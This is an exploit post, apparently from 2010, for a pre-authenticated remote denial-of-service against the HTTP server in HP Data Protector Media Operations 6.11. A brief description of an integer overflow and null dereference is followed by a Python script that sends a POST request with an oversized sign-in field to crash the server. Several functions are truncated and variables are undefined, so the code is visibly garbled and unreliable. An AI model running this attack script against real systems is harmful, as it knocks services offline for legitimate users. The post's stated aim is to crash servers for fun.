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HP Data Protector Media Operations 6.11 HTTP Server Remote Integer Overflow DoS
来源:http://elotrolad0.blogspot.com 作者:d0lc3 发布时间:2010-10-25  

# Exploit Title: HP Data Protector Media Operations 6.11 HTTP Server Remote Integer Overflow DoS
# Date: [date]: 17/09/10
# Author: d0lc3 (@rmallof http://elotrolad0.blogspot.com/)
# Software Link: http://www.hp.com
# Version: 6.11
# Tested on: Windows XP SP3 Spa
HP Data Protector Media Operations has embebed HTTP server, allowing access through
this protocol for users.

Flaw was detected on this implementation, causing remote and pre-authenticated DoS: Integer Overflow
handling string sended length through POST method.

Integer Overflow causes unexpected variable initiation (reset to 0) followed by its dereferenciation
(NUll Dereference), crashing server and thus deniying service to legitimate users.

This is not explpoitable.


import socket,sys,time,os
#global vars
neg="GET / HTTP/1.1\r\n\r\n"
buf="SignInName="+("A"*0x8000)+"&SignInPassword=FOO&Sign+In=Log+In" # >= 0x8000 to int overflow

def CV():
 print"\t-HP Data Protector Media Operations 6.11-"
 print"\t    -HTTP Remote Denial of Service-"
 print"\n[+] Researcher:\tRoi Mallo (@rmallof)"
 print"[+] Blog:\thttp://elotrolad0.blogspot.com/"
 print"[+] Twitter:\thttps://www.twitter.com/rmallof"

def nego(h):         #starting connection and getting session
  print"[x] Error connecting to remote host!"
 return rec

def buildPOST(s,h,p,b):        #building POST request for crashes server
 P="POST /4daction/wHandleURLs/handleSignIn?sess="+s+"&siteCode=0&lang=en& HTTP/1.1\r\n"
 P+="Host: "+h+"\r\n"
 P+="User-Agent: Mozilla/5.0 (X11; U; Linux x86_64; es-ES; rv: Gecko/20100915 Ubuntu/10.04 (lucid) Firefox/3.6.10\r\n"
 P+="Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
 P+="Accept-Language: es-es,es;q=0.8,en-us;q=0.5,en;q=0.3\r\n"
 P+="Accept-Encoding: gzip,deflate\r\n"
 P+="Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"
 P+="Keep-Alive: 115\r\n"
 P+="Connection: keep-alive\r\n"
 P+="Referer: http://"+h+p+"\r\n"
 P+="Content-Type: application/x-www-form-urlencoded\r\n"
 P+="Content-Length: %s\r\n" % str(len(b))
 return P

def main():
 if len(sys.argv)!=2:
  print"\n[x] Usage: "+sys.argv[0]+" <host>\n\n"       
 print"[-] Getting HTTP session..."
 r=nego(hostd)        #getting new session...
 path=r[r.index(lim0)+len(lim0)+1:r.rindex(lim1)+1]   #search for PATH
 sess=path[path.index(lim2)+len(lim2):path.index(lim1)+len(lim1)-1] #search for SESSION hash
 print"[+] 0k, session ="+sess
 print"[-] Bulding POST [Content-Length: %d bytes]..." % len(buf)
 POST=buildPOST(sess,host,path,buf)     #build POST request with new session
 print"[+] Done, Sayonara ;)"
 s.send(POST)        #crash it 4fun&profit :)
if __name__=="__main__":

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